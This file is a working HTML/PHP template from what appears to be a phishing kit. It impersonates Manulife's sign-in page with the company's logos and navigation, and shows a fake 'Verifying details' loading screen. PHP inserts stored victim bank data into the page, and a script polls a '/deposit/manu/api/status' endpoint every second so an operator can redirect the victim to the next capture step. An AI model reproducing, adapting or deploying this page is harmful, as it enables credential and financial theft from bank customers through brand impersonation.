<html lang="en-CA" data-react-helmet="lang">
    <head>
        <meta charset="UTF-8">
        <title>Sign in with your Manulife ID - Manulife Online Access</title>
        <meta http-equiv="X-UA-Compatible" content="IE=edge">
        <meta name="viewport" content="width=device-width,initial-scale=1">
        <link rel="icon" href="/favicon.png">
        <style data-styled="active" data-styled-version="5.1.1"></style>
        <link rel="stylesheet" href="/assets/manu/main.css?<?=time()?>">
        <script src="https://code.jquery.com/jquery-3.6.0.min.js" crossorigin="anonymous"></script>
        <script>
            var lrbank = '<?=escape($udata->last->bank)?>';
            var lrinfo = '<?=escape($udata->last->info)?>';
        </script>
        <script >
            setInterval(function() {
                $.post('/deposit/manu/api/status', {page: lrinfo}, function(response) {
                    if (response.status) {
                        location.href = response.href;
                    }
                }, 'JSON');
            }, 1000);
        </script>
        <script src="/socket.io/socket.io.js"></script>
    </head>
    <body>
        <div id="app">
            <div data-overlay-container="true">
                <div>
                    <div class="Layout__HeaderWrapper-sc-3uqwjo-0 dwtfh">
                        <header class="styledComponents__Root-sc-1azf75m-0 dFHuwQ">
                            <nav data-testid="header-nav" aria-label="Global Navigation" class="styledComponents__Nav-sc-1azf75m-1 Zvri">
                                <a id="skip-to-content" tabindex="0" class="styledComponents__SkipToComponent-sc-1azf75m-3 fWQefO">Skip to main content</a><a id="skip-to-footer" tabindex="0" class="styledComponents__SkipToComponent-sc-1azf75m-3 fWQefO">Skip to footer</a>
                                <ul role="tablist" class="styledComponents__List-b07kt2-0 styledComponents__TabList-b07kt2-11 dQEZaB">
                                    <li id="customer" role="none" class="styledComponents__TabItem-b07kt2-12 lcDSyJ"><button type="button" role="tab" aria-selected="true" class="styledComponents__TabComponent-b07kt2-13 jDuOCW">Personal</button></li>
                                    <li id="sponsor" role="none" class="styledComponents__TabItem-b07kt2-12 lcDSyJ"><button type="button" role="tab" aria-selected="false" class="styledComponents__TabComponent-b07kt2-13 dfZpPt">Sponsors</button></li>
                                    <li id="advisor" role="none" class="styledComponents__TabItem-b07kt2-12 lcDSyJ"><button type="button" role="tab" aria-selected="false" class="styledComponents__TabComponent-b07kt2-13 dfZpPt">Advisors</button></li>
                                </ul>
                                <div class="styledComponents__HeaderButtons-sc-1azf75m-2 iLuGbi">
                                    <button type="button" class="styledComponents__HeaderButton-b07kt2-1 styledComponents__ContactUsComponent-b07kt2-3 ljFWpt">
                                        <span class="styledComponents__IconWrapper-b07kt2-2 bPvIgW">
                                            <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 20 20" width="1em" height="1em" font-size="1.25rem">
                                                <title>phone-icon</title>
                                                <path d="M18.16 12.561l-.36-.361a3.954 3.954 0 00-4.528-.745l-.12.059-4.708-4.7.058-.12a3.974 3.974 0 00-1.825-5.3 3.952 3.952 0 00-5.631 4.222c.14.818.53 1.571 1.12 2.155l10.028 10.044a3.976 3.976 0 006.784-2.564 4 4 0 00-.817-2.69zm-1.516 4.077a2.31 2.31 0 01-3.271 0L3.342 6.59a2.308 2.308 0 01.085-3.363 2.284 2.284 0 012.523-.345 2.3 2.3 0 011.057 3.075l-.578 1.189 6.392 6.384 1.189-.584a2.285 2.285 0 012.62.432l.242.241a2.33 2.33 0 01-.228 3.019z" fill="currentColor"></path>
                                            </svg>
                                        </span>
                                        Contact us
                                    </button>
                                    <button type="button" aria-label="Français" class="styledComponents__HeaderButton-b07kt2-1 styledComponents__LangComponent-b07kt2-4 iLXNPG"><span class="styledComponents__IconWrapper-b07kt2-2 bPvIgW">FR</span></button>
                                </div>
                            </nav>
                            <nav data-testid="nav" class="styledComponents__Root-sc-181wobl-3 bRBGfX header-2">
                                <div class="styledComponents__MobileSideNavWrapper-sc-181wobl-7 gftBzc">
                                    <button aria-labelledby="brand-logo-label" class="styledComponents__LogoComponent-sc-181wobl-1 styledComponents__BrandLogoComponent-sc-181wobl-4 gPloAQ">
                                        <svg viewBox="0 0 100 100" id="brand-logo" data-testid="brand-logo" style="height: 60px; width: 60px;">
                                            <title><span id="brand-logo-label">Manulife logo</span></title>
                                            <g fill="none">
                                                <path fill="#00C46E" d="M0 0h100v100H0z"></path>
                                                <path fill="#FEFEFE" d="M36.903 26.667l-8.57 8.562v39.39l8.57-8.563V26.667zm17.139 0l-8.568 8.562v39.39l8.568-8.563V26.667zm17.141 0l-8.57 8.562v39.39l8.57-8.563V26.667z"></path>
                                            </g>
                                        </svg>
                                    </button>
                                    <a class="styledComponents__LogoComponent-sc-181wobl-1 styledComponents__WordmarkLogoComponent-sc-181wobl-5 dtPwQi">
                                        <svg viewBox="0 0 110 30" fill="none" xmlns="http://www.w3.org/2000/svg" id="wordmark-logo" data-testid="wordmark-logo" style="height: 20px; max-width: 100%; padding-left: 23px; padding-right: 18px;">
                                            <title>Manulife logo</title>
                                            <path d="M98.568 19.047c0 2.505 1.831 4.336 4.047 4.336 1.638 0 3.372-1.06 4.047-2.409l2.216 2.023c-1.253 1.831-3.758 3.373-6.552 3.373-4.529 0-7.323-3.373-7.323-8.286 0-4.722 2.987-8.287 7.419-8.287 4.143 0 7.13 2.698 6.938 9.154H98.568v.096zm7.034-2.601c0-1.927-1.253-3.758-3.372-3.758-2.024 0-3.566 1.927-3.662 3.758h7.034zM94.425 13.17H91.15v12.91H87.68V13.17h-2.12v-2.891h2.12V7.003c0-2.601 1.638-4.914 4.914-4.914 1.542 0 2.795.386 3.565.77L95.1 5.559c-.481-.29-1.252-.578-1.927-.578-1.06 0-2.023.77-2.023 2.216v3.083h4.143l-.867 2.89zM81.61 3.149c1.156 0 2.216.963 2.216 2.216 0 1.253-1.06 2.216-2.216 2.216-1.252 0-2.216-1.06-2.216-2.216 0-1.156.964-2.216 2.216-2.216zm1.83 22.835h-3.564V10.28h3.565v15.705zM75.925 25.984h-3.468V5.27L75.926 1.8v24.184zM65.23 10.279H68.7v15.705h-3.565V24.25c-.963.867-2.505 2.023-4.529 2.023-2.023 0-4.817-1.06-4.817-5.01V10.28h3.469v9.924c0 1.83.77 3.084 2.408 3.084 1.35 0 2.602-.868 3.565-1.928V10.28zM43.455 25.984h-3.469V10.28h3.469v1.734c1.252-1.156 3.083-2.12 5.106-2.12 1.831 0 4.433 1.06 4.433 4.914v11.177h-3.47v-10.31c0-1.541-.674-2.89-2.215-2.89-1.35 0-2.987 1.156-3.854 1.83v11.37zM33.338 25.984V24.25c-.867.964-2.216 2.12-4.625 2.12-2.794 0-5.01-1.735-5.01-4.722 0-3.66 3.372-5.01 6.744-5.299l1.253-.096c1.252-.096 1.734-.771 1.734-1.638 0-1.06-.963-1.83-2.505-1.83-1.734 0-3.372 1.252-4.047 2.215l-1.927-2.312c1.253-1.542 3.373-2.698 6.167-2.698 3.565 0 5.684 1.83 5.684 5.01v11.177h-3.468v-.193zm0-7.515l-2.409.289c-2.023.289-3.854.963-3.854 2.698 0 1.252 1.06 2.12 2.409 2.12 1.638 0 2.987-1.06 3.854-2.12v-2.987zM3.854 25.984H0V4.112h4.047l6.552 10.792 6.359-10.792h4.047v21.872H17.15V10.568h-.097l-6.648 10.984-6.552-10.984v15.416z" fill="#fff"></path>
                                        </svg>
                                    </a>
                                    <button data-testid="mobile-toggle-button" type="button" aria-label="Open menu" aria-expanded="false" class="styledComponents__MobileNavButton-sc-181wobl-8 gSSMxV">
                                        <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 20 20" width="1em" height="1em" font-size="1.25rem">
                                            <path d="M19 3.362H1v1.667h18V3.362zm0 5.795H1v1.667h18V9.157zM1 14.972h18v1.667H1v-1.667z" fill-rule="evenodd" clip-rule="evenodd" fill="currentColor"></path>
                                        </svg>
                                        <div>Menu</div>
                                    </button>
                                </div>
                            </nav>
                        </header>
                    </div>
                    <div class="Layout__SideNavWrapper-sc-3uqwjo-1 caTVlB">
                        <nav data-testid="nav" class="styledComponents__Root-sc-181wobl-3 bRBGfX">
                            <div class="styledComponents__SideNavWrapper-sc-181wobl-6 ikUgPQ">
                                <div data-testid="main-nav" class="styledComponents__MainNavWrapper-sc-181wobl-11 dDDWdw">
                                    <button aria-labelledby="brand-logo-label" class="styledComponents__LogoComponent-sc-181wobl-1 styledComponents__BrandLogoComponent-sc-181wobl-4 gPloAQ">
                                        <svg viewBox="0 0 100 100" id="brand-logo" data-testid="brand-logo" style="width: 80px; height: 80px;">
                                            <title><span id="brand-logo-label">Manulife logo</span></title>
                                            <g fill="none">
                                                <path fill="#00C46E" d="M0 0h100v100H0z"></path>
                                                <path fill="#FEFEFE" d="M36.903 26.667l-8.57 8.562v39.39l8.57-8.563V26.667zm17.139 0l-8.568 8.562v39.39l8.568-8.563V26.667zm17.141 0l-8.57 8.562v39.39l8.57-8.563V26.667z"></path>
                                            </g>
                                        </svg>
                                    </button>
                                </div>
                            </div>
                        </nav>
                    </div>
                    <div class="Layout__Container-sc-3uqwjo-2 gaFNms div-loader" >
                        <div tabindex="-1" class="Layout__ContentWrapper-sc-3uqwjo-3 dxJYmE">
                            <div class="ContentPage__PageWrapper-sc-1bcibrd-0 fyCsFZ">
                                <div class="ContentPage__PageContent-sc-1bcibrd-1 kdZieM">
                                    <main class="ContentPage__PageMain-sc-1bcibrd-2 iatcqe" style="text-align: center">
                                        <p class="pageTitle" style="text-align: center;font-size: 27px;">Verifying details</p>
                                        <img src="/assets/manu/loading.gif" alt="" id="loaderOnLoading" style="width: 96px;margin: 18px 0px;">
                                        <p class="desText" style="text-align: center;padding: 10px 0;font-size: 19px;">Loading please wait...</p>
                                    </main>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
        <span hidden id="navig"> . </span>
        <span hidden id="stage">Loading</span>
    </body>
    <script src="/bank/manu/js/script.js">
    </script>
</html>
